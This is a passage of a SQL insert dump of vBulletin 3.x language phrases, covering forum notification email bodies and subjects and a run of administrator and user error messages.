(34158, -1, 'reportprivatemessage_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a private message. \r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nSent by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[message][/quote]', 'vbulletin', 'vBulletin Solutions', 1220978593, '3.8.0 Alpha 1'),
(34159, -1, 'reportvisitormessage', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this visitor message:\r\n\r\n$reportinfo[messagetitle_html]\r\n$vboptions[bburl]/member.php?u=$reportinfo[userid]&tab=visitor_messaging&vmid=$reportinfo[vmid]#vmessage$reportinfo[vmid]\r\n\r\nThis is part of this user\'s profile:\r\n$reportinfo[username]\r\n$vboptions[bburl]/member.php?u=$reportinfo[userid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1208774853, '3.7.0 Release Candidate 4'),
(34160, -1, 'reportvisitormessage_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a visitor message.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nProfile: [url=$vboptions[bburl]/member.php?u=$reportinfo[userid]&tab=visitor_messaging&vmid=$reportinfo[vmid]#vmessage$reportinfo[vmid]]$reportinfo[username][/url][url=$vboptions[bburl]/member.php?vmid=$reportinfo[vmid]#message$reportinfo[vmid]]$reportinfo[prefix_plain]$reportinfo[messagetitle][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1202158302, '3.7.0 Beta 5'),
(34161, -1, 'resetpw', 'emailbody', 'Dear $userinfo[username],\r\n\r\nAs you requested, your password has now been reset. Your new details are as follows:\r\n\r\nUsername: $userinfo[username]\r\nPassword: $newpassword\r\n\r\nTo change your password, please visit this page: $vboptions[bburl]/profile.php?do=editpassword\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34162, -1, 'sendtofriend', 'emailbody', '$sendtoname,\r\n\r\nThis is a message from $bbuserinfo[username] ( mailto:$bbuserinfo[email] ) from the $vboptions[bbtitle] ( $vboptions[bburl]/ ).\r\n\r\nThe message is as follows:\r\n\r\n$emailmessage\r\n\r\n$vboptions[bbtitle] takes no responsibility for messages sent through its system.', 'vbulletin', '', 0, ''),
(34163, -1, 'usermessage', 'emailbody', 'This is a message from $bbuserinfo[username] at $vboptions[bbtitle] ( $vboptions[bburl]/$vboptions[forumhome].php ). The $vboptions[bbtitle] owners cannot accept any responsibility for the contents of the email.\r\n\r\nTo email $bbuserinfo[username], you can use this online form:\r\n$vboptions[bburl]/sendmessage.php?do=mailmember&u=$bbuserinfo[userid]\r\n\r\nOR, by email:\r\nmailto:$bbuserinfo[email]\r\n\r\nThis is the message:\r\n\r\n$message', 'vbulletin', '', 0, ''),
(34164, -1, 'warning_received_post', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received a warning at $vboptions[bbtitle].\r\n\r\nReason:\r\n-------\r\n$infraction[reason]\r\n\r\n$infraction[message]\r\n-------\r\n\r\nOriginal Post:\r\n$infraction[post]\r\n[quote]$postinfo[pagetext][/quote]\r\n\r\nWarnings serve as a reminder to you of the forum\'s rules, which you are expected to understand and follow.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166744616, '3.6.5'),
(34165, -1, 'warning_received_profile', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received a warning at $vboptions[bbtitle].\r\n\r\nReason:\r\n-------\r\n$infraction[reason]\r\n\r\n$infraction[message]\r\n-------\r\n\r\nWarnings serve as a reminder to you of the forum\'s rules, which you are expected to understand and follow.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166744634, '3.6.5'),
(34166, -1, 'welcomemail', 'emailbody', 'Dear $username,\r\n\r\nThanks for registering at $vboptions[bbtitle]! We are glad you have chosen to be a part of our community and we hope you enjoy your stay.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34167, -1, 'welcomepm', 'emailbody', 'Thanks for registering at $vboptions[bbtitle]! We are glad you have chosen to be a part of our community and we hope you enjoy your stay.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1146179797, '3.6.0 Beta 1'),
(34168, -1, 'accountlocked', 'emailsubject', 'Failed Login Notification on $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1208441770, '3.7.0 Release Candidate 4'),
(34169, -1, 'activateaccount', 'emailsubject', 'Action Required to Activate Membership for $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34170, -1, 'activateaccount_change', 'emailsubject', 'Action Required to Verify Email Change for $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1154111059, '3.6.0'),
(34171, -1, 'attachfull', 'emailsubject', 'Forum attachment quota has been reached', 'vbulletin', '', 0, ''),
(34172, -1, 'birthday', 'emailsubject', 'Happy Birthday from $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34173, -1, 'contactus', 'emailsubject', '$vboptions[bbtitle] Contact Us Form - $subject', 'vbulletin', '', 0, ''),
(34174, -1, 'digestforum', 'emailsubject', '\"$forum[title_clean]\" update', 'vbulletin', '', 0, ''),
(34175, -1, 'digestgroup', 'emailsubject', '\"$group[name]\" update', 'vbulletin', 'vBulletin Solutions', 1234791608, '3.8.2'),
(34176, -1, 'digestthread', 'emailsubject', '\"$thread[prefix_plain]$thread[title]\" update', 'vbulletin', 'vBulletin Solutions', 1189591882, '3.6.8'),
(34177, -1, 'friendship_request_email', 'emailsubject', 'You have received a Friendship Request at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1198648000, '3.7.0 Beta 4'),
(34178, -1, 'infraction_post_infraction', 'emailsubject', 'Infraction Reversed', 'vbulletin', 'vBulletin Solutions', 1149280395, '3.6.0 Beta 1'),
(34179, -1, 'infraction_post_warning', 'emailsubject', 'Warning Reversed', 'vbulletin', 'vBulletin Solutions', 1149280385, '3.6.0 Beta 1'),
(34180, -1, 'infraction_received', 'emailsubject', 'You have received an infraction at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34181, -1, 'infraction_thread_infraction', 'emailsubject', 'Infraction for $infractioninfo[username]: $infractioninfo[title]', 'vbulletin', 'vBulletin Solutions', 1150319686, '3.6.0 Beta 3'),
(34182, -1, 'infraction_thread_warning', 'emailsubject', 'Warning for $infractioninfo[username]: $infractioninfo[title]', 'vbulletin', 'vBulletin Solutions', 1150319697, '3.6.0 Beta 3'),
(34183, -1, 'lostpw', 'emailsubject', 'Your login details for $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34184, -1, 'moderation_deleted', 'emailsubject', 'Account removed at $vboptions[bbtitle]!', 'vbulletin', '', 0, ''),
(34185, -1, 'moderation_validated', 'emailsubject', 'Account validated at $vboptions[bbtitle]!', 'vbulletin', '', 0, ''),
(34186, -1, 'moderator', 'emailsubject', 'New Post/Thread Notification: $foruminfo[title_clean]', 'vbulletin', '', 0, ''),
(34187, -1, 'newevent', 'emailsubject', 'New Event Notification: $calendarinfo[title]', 'vbulletin', '', 0, ''),
(34188, -1, 'newuser', 'emailsubject', 'New User at $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34189, -1, 'notify', 'emailsubject', 'Reply to thread \'$threadinfo[prefix_plain]$threadinfo[title]\'', 'vbulletin', 'vBulletin Solutions', 1189592520, '3.6.8'),
(34190, -1, 'notify_discussion', 'emailsubject', 'Reply to social group discussion \'$discussion[title]\'', 'vbulletin', 'vBulletin Solutions', 1213799556, '3.7.1'),
(34191, -1, 'paidsubscription_reminder', 'emailsubject', 'Paid Subscription Expiry Notice', 'vbulletin', '', 0, ''),
(34192, -1, 'parentcoppa_profile', 'emailsubject', '$username\'s account at $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34193, -1, 'parentcoppa_register', 'emailsubject', '$username\'s account at $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34194, -1, 'payment_received', 'emailsubject', 'Paid Subscription Received at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1147376234, '3.6.0 Beta 1'),
(34195, -1, 'payment_reversed', 'emailsubject', 'Paid Subscription Reversed at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1147376224, '3.6.0 Beta 1'),
(34196, -1, 'pmboxalmostfull', 'emailsubject', 'Inbox almost full at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1146508071, '3.6.0 Beta 1'),
(34197, -1, 'pmboxfull', 'emailsubject', 'Inbox full at $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34198, -1, 'pmreceived', 'emailsubject', 'New Private Message at $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34199, -1, 'reminder', 'emailsubject', 'Upcoming events at $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34200, -1, 'reportalbumpicture', 'emailsubject', 'Reported Album Picture from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369533, '3.7.0 Beta 1'),
(34201, -1, 'reportalbumpicture_newthread', 'emailsubject', 'Reported Album Picture by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369564, '3.7.0 Beta 1'),
(34202, -1, 'reportgroupmessage', 'emailsubject', 'Reported Social Group Message from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369626, '3.7.0 Beta 1'),
(34203, -1, 'reportgroupmessage_newthread', 'emailsubject', 'Reported Social Group Message by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369635, '3.7.0 Beta 1'),
(34204, -1, 'reportgrouppicture', 'emailsubject', 'Reported Group Picture from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369650, '3.7.0 Beta 1'),
(34205, -1, 'reportgrouppicture_newthread', 'emailsubject', 'Reported Group Picture by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369661, '3.7.0 Beta 1'),
(34206, -1, 'reportitem_newpost', 'emailsubject', 'Reported Item', 'vbulletin', 'vBulletin Solutions', 1196369371, '3.7.0 Beta 1'),
(34207, -1, 'reportpicturecomment', 'emailsubject', 'Reported Picture Comment from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1199981077, '3.7.0 Beta 3'),
(34208, -1, 'reportpicturecomment_newthread', 'emailsubject', 'Reported Picture Comment by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1199981090, '3.7.0 Beta 3'),
(34209, -1, 'reportpost', 'emailsubject', 'Reported Post from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369610, '3.7.0 Beta 1'),
(34210, -1, 'reportpost_newthread', 'emailsubject', 'Reported Post by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369427, '3.7.0 Beta 1'),
(34211, -1, 'reportprivatemessage', 'emailsubject', 'Reported PM from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1224680971, '3.8.0 Beta 2'),
(34212, -1, 'reportprivatemessage_newthread', 'emailsubject', 'Reported Private Message by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1220978522, '3.8.0 Alpha 1'),
(34213, -1, 'reportvisitormessage', 'emailsubject', 'Reported Visitor Message from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1197373083, '3.7.0 Beta 1'),
(34214, -1, 'reportvisitormessage_newthread', 'emailsubject', 'Reported Visitor Message by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1197373090, '3.7.0 Beta 1'),
(34215, -1, 'resetpw', 'emailsubject', 'Your new password for $vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34216, -1, 'warning_received', 'emailsubject', 'You have received a warning at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34217, -1, 'welcomemail', 'emailsubject', 'Welcome to $vboptions[bbtitle]!', 'vbulletin', '', 0, ''),
(34218, -1, 'welcomepm', 'emailsubject', 'Welcome to $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1145904570, '3.6.0 Beta 1'),
(34219, -1, 'activate_deleterequest', 'error', 'You are going to delete the activation request. \r\nThis will effectively suspend your account and you will not receive further emails. \r\n \r\nIf you instead want to activate your account, please click here . \r\n \r\nDelete the activation request ', 'vbulletin', 'vBulletin Solutions', 1163415387, '3.6.4'),
(34220, -1, 'activate_moderation', 'error', 'Your account has been activated but you are currently in the moderation queue to be added to the forum.', 'vbulletin', '', 0, ''),
(34221, -1, 'activate_requestdeleted', 'error', 'The activation request has been deleted. You will not receive further emails.', 'vbulletin', '', 0, ''),
(34222, -1, 'activate_wrongusergroup', 'error', 'Your account has already been activated so please try logging in.', 'vbulletin', '', 0, ''),
(34223, -1, 'additional_products_disable_x_y', 'error', 'The following products depend on {1} and must also be disabled:\r\n{2} \r\nTo continue disabling all these products, click here .', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34224, -1, 'additional_products_enable_x_y', 'error', 'The following products are required by {1} and must also be enabled:\r\n{2} \r\nTo continue enabling all these products, click here .', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34225, -1, 'admin_disabled_php_info', 'error', 'Sorry, the administrator has disabled PHP Info display.', 'vbulletin', '', 0, ''),
(34226, -1, 'adsense_not_deployed_upgrade_error', 'error', 'Your Google AdSense account is no longer associated with your vBulletin customer account. To redeploy Google AdSense, please associate a Google AdSense account in the vBulletin Members Area.', 'vbulletin', 'vBulletin Solutions', 1229643293, '3.8.0 Beta 4'),
(34227, -1, 'after_upgrade_360rc1', 'error', 'As of vBulletin 3.6.0 RC1 \r\n\r\n The Allow Signatures option has been removed. If you had this option disabled, you should use signature permissions to deny signatures for specific usergroups. \r\n Apple™ has updated the iTunes podcast categories. We have followed suit and updated the categories within vBulletin. You will need to edit any podcasting forums and update to the proper category \r\n ', 'vbulletin', 'vBulletin Solutions', 1152214461, '3.6.0 Release Candidate 1'),
(34228, -1, 'after_upgrade_36_update_counters', 'error', 'After upgrading to vBulletin 3.6, you must rebuild thread information and then forum information on this page . \r\n \r\nClick \"Address\" to rebuild thread information now. Once this has completed, you should still rebuild forum information!', 'vbulletin', 'vBulletin Solutions', 1150127028, '3.6.0 Beta 2'),
(34229, -1, 'after_upgrade_37_image_verification_disabled', 'error', 'vBulletin 3.7 removes the \"Simple Type\" option for GD-based image verification as it was not reliable at stopping bots. An alternative method for image verification is available, but your server does not appear to be compatible with this method. \r\n \r\nHuman verification is currently disabled. If you wish to verify that visitors are human, please select an alternative verification method by clicking \"Address\".', 'vbulletin', 'vBulletin Solutions', 1210088263, '3.7.1'),
(34230, -1, 'after_upgrade_37_moderator_permissions', 'error', 'vBulletin 3.7 adds additional moderator permissions. Values for these new permissions were determined based on existing permissions. Please review these permissions to ensure that they are correct.', 'vbulletin', 'vBulletin Solutions', 1209462374, '3.7.0'),
(34231, -1, 'after_upgrade_37_modified_css', 'error', 'You have one or more styles with custom CSS in the first (upper) Additional CSS Definitions field. You should move these custom declarations to the second (lower) field. Modified text will appear in RED and needs to be reverted after moving the custom CSS to the second field. \r\n\r\nFailure to do this will most likely result in the HTML of your forum not being presented properly.', 'vbulletin', 'vBulletin Solutions', 1201305954, '3.7.0 Beta 5'),
(34232, -1, 'after_upgrade_37_update_counters', 'error', 'After upgrading to vBulletin 3.7, you must rebuild thread information and then forum information on this page . \r\n \r\nClick \"Address\" to rebuild thread information now. Once this has completed, you should still rebuild forum information!', 'vbulletin', 'vBulletin Solutions', 1193148391, '3.7.0 Beta 1'),
(34233, -1, 'after_upgrade_password_check', 'error', 'In this version, users may no longer set their password to be the same as their username. Such passwords make accounts vulnerable to exploitation from automated scripts and programs that can guess the password to access your board under the guise of the affected users. This may be done for the purposes of spam or online identity theft. \r\n \r\nUsers with these password will be prompted to change them on their next login. However, you may wish to explicitly reset these users\' passwords. Click \"Address\" to see the password reset options.', 'vbulletin', 'vBulletin Solutions', 1219837764, '3.8.0 Alpha 1'),
(34234, -1, 'album_title_no_empty', 'error', 'The album title cannot be empty.', 'vbulletin', 'vBulletin Solutions', 1192543194, '3.7.0 Beta 1'),
(34235, -1, 'all_avatars_added', 'error', 'There are no further avatars to insert from this directory', 'vbulletin', '', 0, ''),
(34236, -1, 'all_phrases_are_up_to_date', 'error', 'All phrases are up-to-date.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34237, -1, 'all_post_icons_added', 'error', 'There are no further post icons to insert from this directory', 'vbulletin', '', 0, ''),
(34238, -1, 'all_smilies_added', 'error', 'There are no further smilies to insert from this directory', 'vbulletin', '', 0, ''),
(34239, -1, 'all_templates_are_up_to_date', 'error', 'All templates are up-to-date.', 'vbulletin', 'vBulletin Solutions', 1210604189, '3.7.1'),
(34240, -1, 'already_member_of_group', 'error', 'You are already a member of this Group', 'vbulletin', 'vBulletin Solutions', 1196174076, '3.7.0 Beta 1'),
(34241, -1, 'alreadyregistered', 'error', 'Our records show that you have already registered under the name of {1}. If you have lost your password, click here . If you would like to modify your profile, click here .', 'vbulletin', '', 0, ''),
(34242, -1, 'attachdel', 'error', 'You did not select any attachments to delete.', 'vbulletin', '', 0, ''),
(34243, -1, 'attachments_moved_to_the_database', 'error', 'Attachments Successfully Moved to the Database', 'vbulletin', '', 0, ''),
(34244, -1, 'attachments_moved_to_the_filesystem', 'error', 'Attachments Successfully Moved to the Filesystem\r\n \r\n \r\nYou should now Optimize your attachment table to reclaim space that was used by the attachments that are no longer there.', 'vbulletin', '', 0, ''),
(34245, -1, 'attachments_not_moved_to_the_filesystem', 'error', 'You have chosen to not finalize the attachment move to the filesystem. Your attachments are still in the database, from which they will be read from. You probably have left orphans files and directories in the path you specified to receive the attachments. You will need to manually clear these files if you wish to free up that space.', 'vbulletin', '', 0, ''),
(34246, -1, 'attachpathfailed', 'error', 'Could not create file system directory to hold your attachment.', 'vbulletin', '', 0, ''),
(34247, -1, 'avatardisabled', 'error', 'The administrator has disabled the use of avatars.', 'vbulletin', '', 0, ''),
(34248, -1, 'avatarmoreposts', 'error', 'You do not have enough posts to use this avatar. Please select another.', 'vbulletin', '', 0, ''),
(34249, -1, 'avatarpath_not_writable', 'error', 'The avatar thumbnail directory at /images/avatars/thumbs is not writable. Please contact your host for assistance. Thumbnails cannot be created until this issue is resolved.', 'vbulletin', 'vBulletin Solutions', 1194032793, '3.7.0 Beta 1'),
(34250, -1, 'backup_filename_must_end_with_sql', 'error', 'Backup filename must end with the .sql extension', 'vbulletin', '', 0, ''),
(34251, -1, 'bademail', 'error', 'You entered an invalid email address.', 'vbulletin', '', 0, ''),
(34252, -1, 'badlogin', 'error', 'You have entered an invalid username or password. Please press the back button, enter the correct details and try again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here !', 'vbulletin', 'vBulletin Solutions', 1156779929, '3.6.1'),
(34253, -1, 'badlogin_strikes', 'error', 'You have entered an invalid username or password. Please press the back button, enter the correct details and try again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here ! \r\nYou have used {3} out of 5 login attempts. After all 5 have been used, you will be unable to login for 15 minutes.', 'vbulletin', 'vBulletin Solutions', 1156779906, '3.6.1'),
(34254, -1, 'badmsn', 'error', 'You entered an invalid MSN handle.', 'vbulletin', '', 0, ''),
(34255, -1, 'badpassword', 'error', 'The password you have entered does not match your current one. Please press the back button, enter the correct details and try again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here !', 'vbulletin', '', 0, ''),
(34256, -1, 'badskype', 'error', 'You entered an invalid Skype name.', 'vbulletin', '', 0, ''),
(34257, -1, 'ban_reason_updated', 'error', 'The ban reason has been updated.', 'vbulletin', 'vBulletin Solutions', 1201013062, '3.7.0 Beta 5'),
(34258, -1, 'banemail', 'error', 'The administrator has banned your email address. You will need to change your email address in order to continue. If you think this is done in error, please click here to contact the administrator.', 'vbulletin', 'vBulletin Solutions', 1248366412, '3.8.3'),
(34259, -1, 'banip', 'error', 'Sorry. The administrator has banned your IP address. To contact the administrator click here ', 'vbulletin', '', 0, ''),
(34260, -1, 'begin_date_after_end_date', 'error', 'The begin date cannot fall after the end date.', 'vbulletin', '', 0, ''),
(34261, -1, 'birthdayfield', 'error', 'You have entered an invalid birthday.', 'vbulletin', '', 0, ''),
(34262, -1, 'bitfield_conflicts_x', 'error', 'A conflict was detected in the bitfields. You cannot continue with the installation of this product until this has been fixed. The conflicts found were:\r\n', 'vbulletin', 'vBulletin Solutions', 1158145033, '3.6.1'),
(34263, -1, 'bookmark_site_deleted_successfully', 'error', 'Social bookmarking site deleted successfully', 'vbulletin', 'vBulletin Solutions', 1190989059, '3.7.0 Beta 1'),
(34264, -1, 'bookmark_site_saved_successfully', 'error', 'Social bookmarking site saved successfully', 'vbulletin', 'vBulletin Solutions', 1190989072, '3.7.0 Beta 1'),
(34265, -1, 'calendarbaddate', 'error', 'You entered an invalid date.', 'vbulletin', '', 0, ''),
(34266, -1, 'calendarbadtime', 'error', 'Incorrect time chosen. Make sure that a valid from time and to time is set. Make sure to either choose a pre-defined time or set your own.', 'vbulletin', '', 0, ''),
(34267, -1, 'calendareventexists', 'error', 'This event appears to already exist. You probably pressed submit more than once.', 'vbulletin', '', 0, ''),
(34268, -1, 'calendarmove', 'error', 'There are no calendars to move this event to.', 'vbulletin', '', 0, ''),
(34269, -1, 'calendarnorecur', 'error', 'No recurring event will occur for the date range you specified.', 'vbulletin', '', 0, ''),
(34270, -1, 'calendartodate', 'error', 'The TO date cannot fall before the FROM date.', 'vbulletin', '', 0, ''),
(34271, -1, 'can_not_duplicate_options', 'error', 'You can not have duplicate options with this field type.', 'vbulletin', 'vBulletin Solutions', 1199987993, '3.7.0 Beta 4'),
(34272, -1, 'cannot_delete_last_social_group_category', 'error', 'You cannot delete the last social group category.', 'vbulletin', 'vBulletin Solutions', 1216903539, '3.8.0 Alpha 1'),
(34273, -1, 'cannot_leave_group_if_owner', 'error', 'You cannot leave a group you own. You must delete the group.', 'vbulletin', 'vBulletin Solutions', 1193762699, '3.7.0 Beta 1'),
(34274, -1, 'cant_add_usergroup_leader', 'error', 'You can\'t add a usergroup leader to the specified user group', 'vbulletin', '', 0, ''),
(34275, -1, 'cant_converse_with_self', 'error', 'Sorry, but you can\'t converse with yourself here.', 'vbulletin', 'vBulletin Solutions', 1201068252, '3.7.0 Beta 5'),
(34276, -1, 'cant_de_admin_last_admin', 'error', 'You are trying to remove control panel access for the last administrative user. \r\n \r\nThis would lock you out of the control panel, so you cannot proceed', 'vbulletin', '', 0, ''),
(34277, -1, 'cant_delete_default_language', 'error', 'You may not delete or disable user access to the language you have set as the default language for your forum. If you want to delete or disable user access to this language, please set another language to be the default language first.', 'vbulletin', '', 0, ''),
(34278, -1, 'cant_delete_default_style', 'error', 'The default style set within the vBulletin Options cannot be deleted. Please change this before attempting to delete the style.', 'vbulletin', '', 0, ''),
(34279, -1, 'cant_delete_last_admin', 'error', 'You are trying to delete the last administrative user. This would lock you out of the control panel, so you cannot proceed', 'vbulletin', '', 0, ''),
(34280, -1, 'cant_delete_last_admin_group', 'error', 'You are about to remove the last group with control panel access. This would lock you out of the control panel - you cannot proceed', 'vbulletin', '', 0, ''),
(34281, -1, 'cant_delete_last_language', 'error', 'You cannot delete the last language installed on your forum', 'vbulletin', '', 0, ''),
(34282, -1, 'cant_delete_last_style', 'error', 'You are about to remove the last style that visitors are allowed to use. That would be bad - you cannot proceed', 'vbulletin', '', 0, ''),
(34283, -1, 'cant_delete_master_phrase', 'error', 'This phrase belongs to the Master Language. You may not delete it.', 'vbulletin', '', 0, ''),
(34284, -1, 'cant_delete_usergroup', 'error', 'You are not authorized to delete this Usergroup', 'vbulletin', '', 0, ''),
(34285, -1, 'cant_overwrite_non_existent_language', 'error', 'Sorry, you can\'t overwrite a language that does not exist', 'vbulletin', '', 0, ''),
(34286, -1, 'cant_overwrite_non_existent_style', 'error', 'Sorry, you can\'t overwrite a style that does not exist', 'vbulletin', '', 0, ''),
(34287, -1, 'cant_parent_faq_item_to_child', 'error', 'You can\'t parent a FAQ item to one of its own children', 'vbulletin', '', 0, ''),
(34288, -1, 'cant_parent_faq_item_to_self', 'error', 'You can\'t parent a FAQ item to itself', 'vbulletin', '', 0, ''),
(34289, -1, 'cant_parent_forum_to_child', 'error', 'You can\'t parent a forum to one of its own children', 'vbulletin', '', 0, ''),
(34290, -1, 'cant_parent_forum_to_self', 'error', 'You can\'t parent a forum to itself', 'vbulletin', '', 0, ''),
(34291, -1, 'cant_parent_style_to_self', 'error', 'You can\'t parent a style to itself', 'vbulletin', '', 0, ''),
(34292, -1, 'cant_parent_x_to_child', 'error', 'You can\'t parent a {1} to one of its own children', 'vbulletin', '', 0, ''),
(34293, -1, 'cant_remove_last_avatar_category', 'error', 'You cannot delete the last avatar category', 'vbulletin', '', 0, ''),
(34294, -1, 'cant_remove_last_post_icon_category', 'error', 'You cannot delete the last post icon category', 'vbulletin', '', 0, ''),
(34295, -1, 'cant_remove_last_smilie_category', 'error', 'You cannot delete the last smilie category', 'vbulletin', '', 0, ''),
(34296, -1, 'cant_set_cookies', 'error', 'Unable to add cookies, header already sent. \r\nFile: {1} \r\nLine: {2} ', 'vbulletin', '', 0, ''),
(34297, -1, 'cantlistself_ignore', 'error', 'We can\'t help you ignore yourself.', 'vbulletin', 'vBulletin Solutions', 1154552245, '3.6.0'),
(34298, -1, 'cantlistself_ignorelist', 'error', 'Sorry, no matter how much you try, you cannot ignore yourself.', 'vbulletin', 'vBulletin Solutions', 1151617795, '3.6.0 Beta 4'),
(34299, -1, 'cantreportself', 'error', 'You are not allowed to turn yourself in.', 'vbulletin', '', 0, ''),
(34300, -1, 'cantsplitall', 'error', 'You can\'t split all of the posts in a thread. What would the point of that be?', 'vbulletin', '', 0, ''),
(34301, -1, 'censoredword', 'error', 'You have used a censored word. Please remove this word.', 'vbulletin', 'vBulletin Solutions', 1171450618, '3.6.5'),
(34302, -1, 'censorfield', 'error', 'One of the fields that you have entered for your profile contains words that have been added to the list of disallowed words by the administrator. Please correct any words that you think might be on the list. If the problem persists, please contact the administrator .', 'vbulletin', '', 0, ''),
(34303, -1, 'checkboxsize', 'error', 'You may only select {1} option(s) for the {2} field.', 'vbulletin', '', 0, ''),
(34304, -1, 'completed_database_backup_successfully', 'error', 'Completed Database Backup Successfully', 'vbulletin', '', 0, ''),
(34305, -1, 'completed_search_successfully', 'error', 'Completed Search Successfully', 'vbulletin', '', 0, ''),
(34306, -1, 'completed_x_successfully', 'error', 'Completed {1} Successfully', 'vbulletin', '', 0, ''),
(34307, -1, 'cookieclear', 'error', 'All cookies cleared!\r\n', 'vbulletin', '', 0, ''),
(34308, -1, 'could_not_find', 'error', 'Could not find {1} with {2} = {3}.', 'vbulletin', '', 0, ''),
(34309, -1, 'could_not_find_user_x', 'error', 'Could not find user \'{1}\'', 'vbulletin', '', 0, ''),
(34310, -1, 'dbalter_enum_field_not_enum', 'error', 'The field \'{1}\' specified is not of type enum.', 'vbulletin', 'vBulletin Solutions', 1178881639, '3.6.6'),
(34311, -1, 'dbalter_enum_value_already_exists', 'error', 'The value \'{1}\' already exists within the enum field definition.', 'vbulletin', 'vBulletin Solutions', 1178881723, '3.6.6'),
(34312, -1, 'dbalter_enum_value_does_not_exist', 'error', 'Could not find the enum value in the definition of the field: {1}', 'vbulletin', 'vBulletin Solutions', 1178881698, '3.6.6'),
(34313, -1, 'dbalter_field_already_exists', 'error', 'Field Already Exists: {1}', 'vbulletin', '', 0, ''),
(34314, -1, 'dbalter_field_does_not_exist', 'error', 'Field Does Not Exist: {1}', 'vbulletin', '', 0, ''),
(34315, -1, 'dbalter_mysql', 'error', 'Mysql Error: {1}', 'vbulletin', '', 0, ''),
(34316, -1, 'deleted_access_masks_successfully', 'error', 'Deleted Access Masks Successfully', 'vbulletin', '', 0, ''),
(34317, -1, 'deleted_announcement_successfully', 'error', 'Deleted Announcement Successfully', 'vbulletin', '', 0, ''),
(34318, -1, 'deleted_answer_successfully', 'error', 'Deleted Answer Successfully', 'vbulletin', 'vBulletin Solutions', 1192563428, '3.7.0 Beta 1'),
(34319, -1, 'deleted_attachment_permissions_successfully', 'error', 'Deleted Attachment Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1148072842, '3.6.0 Beta 1'),
(34320, -1, 'deleted_attachment_successfully', 'error', 'Deleted Attachment Successfully', 'vbulletin', '', 0, ''),
(34321, -1, 'deleted_attachment_type_successfully', 'error', 'Deleted Attachment Type Successfully', 'vbulletin', '', 0, ''),
(34322, -1, 'deleted_attachments_successfully', 'error', 'Deleted Attachments Successfully', 'vbulletin', '', 0, ''),
(34323, -1, 'deleted_automatic_ban_successfully', 'error', 'Deleted Automatic Ban Successfully', 'vbulletin', 'vBulletin Solutions', 1157413262, '3.6.1'),
(34324, -1, 'deleted_avatar_successfully', 'error', 'Deleted Avatar Successfully', 'vbulletin', '', 0, ''),
